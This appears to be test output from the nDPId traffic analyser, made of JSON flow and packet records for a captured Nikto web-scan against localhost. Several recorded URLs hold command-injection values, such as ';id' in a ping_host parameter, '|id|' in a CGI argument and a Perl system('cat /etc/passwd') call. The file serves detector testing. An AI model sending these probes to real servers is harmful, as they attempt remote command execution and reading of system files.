-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277549,"pkt":"AAAAAAAAAAAAAAAACABFAADIKVFAAEAGEt1\/AAABfwAAAcXYH5AE3RGlWDKVx4AYAED+vAAAAQEICp1m\/lWdZv5VR0VUIC9sb2dqYW0vc2hvd2hpdHMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTU3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277550,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/wwtAAEAGeSt\/AAABfwAAAcXaH5CLi\/vjqeJa6IAYAED+swAAAQEICp1m\/ladZv5WR0VUIC9tYW51YWwucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277552,"pkt":"AAAAAAAAAAAAAAAACABFAADZ8pVAAEAGSYd\/AAABfwAAAcXcH5AUWcqAeMmTFYAYAED+zQAAAQEICp1m\/lidZv5YR0VUIC9tb2RzL2FwYWdlL2FwYWdlLmNnaT9mPWZpbGUuaHRtLnxpZHwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1576420277553,"pkt":"AAAAAAAAAAAAAAAACABFAAD6YiVAAEAG2dZ\/AAABfwAAAcXeH5DIEFrQ9+zWrIAYAED+7gAAAQEICp1m\/lmdZv5ZR0VUIC9tb2R1bGVzLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":269,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":269,"pkt_l4_len":235,"thread_ts_msec":1576420277554,"pkt":"AAAAAAAAAAAAAAAACABFAAD\/xMZAAEAGdzB\/AAABfwAAAcXgH5A8ZfwprHRx4oAYAED+8wAAAQEICp1m\/lqdZv5aR0VUIC9udWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTYxKQ0KDQo="} -01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420277556,"pkt":"AAAAAAAAAAAAAAAACABFAADi3pNAAEAGXYB\/AAABfwAAAcXiH5AliOZ9pOzTK4AYAED+1gAAAQEICp1m\/lydZv5cR0VUIC9wZXJsLy1lJTIwJTIyc3lzdGVtKCdjYXQlMjAvZXRjL3Bhc3N3ZCcpO1wlMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1576420277558,"pkt":"AAAAAAAAAAAAAAAACABFAAEAA3dAAEAGOH9\/AAABfwAAAcXkH5CI\/DuZGQJJI4AYAED+9AAAAQEICp1m\/l6dZv5eR0VUIC9waHBudWtlL2h0bWwvLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1576420277560,"pkt":"AAAAAAAAAAAAAAAACABFAAECBD1AAEAGN7d\/AAABfwAAAcXmH5DeDzzWjlOxJoAYAED+9gAAAQEICp1m\/mCdZv5gR0VUIC9waHBudWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277561,"pkt":"AAAAAAAAAAAAAAAACABFAADFzD1AAEAGb\/N\/AAABfwAAAcXoH5BUiPTWm6mSyIAYAED+uQAAAQEICp1m\/mGdZv5hR0VUIC9Qcm9ncmFtJTIwRmlsZXMvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277562,"pkt":"AAAAAAAAAAAAAAAACABFAADAFKZAAEAGJ5B\/AAABfwAAAcXqH5AjeyxLwwFcDYAYAED+tAAAAQEICp1m\/mKdZv5iR0VUIC9zbXNzZW5kLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY2KQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277564,"pkt":"AAAAAAAAAAAAAAAACABFAADYoI5AAEAGm49\/AAABfwAAAcXsH5AgHJhkU1YzMYAYAED+zAAAAQEICp1m\/mOdZv5jR0VUIC9wbHMvc2ltcGxlZGFkL2FkbWluXy9kYWRlbnRyaWVzLmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 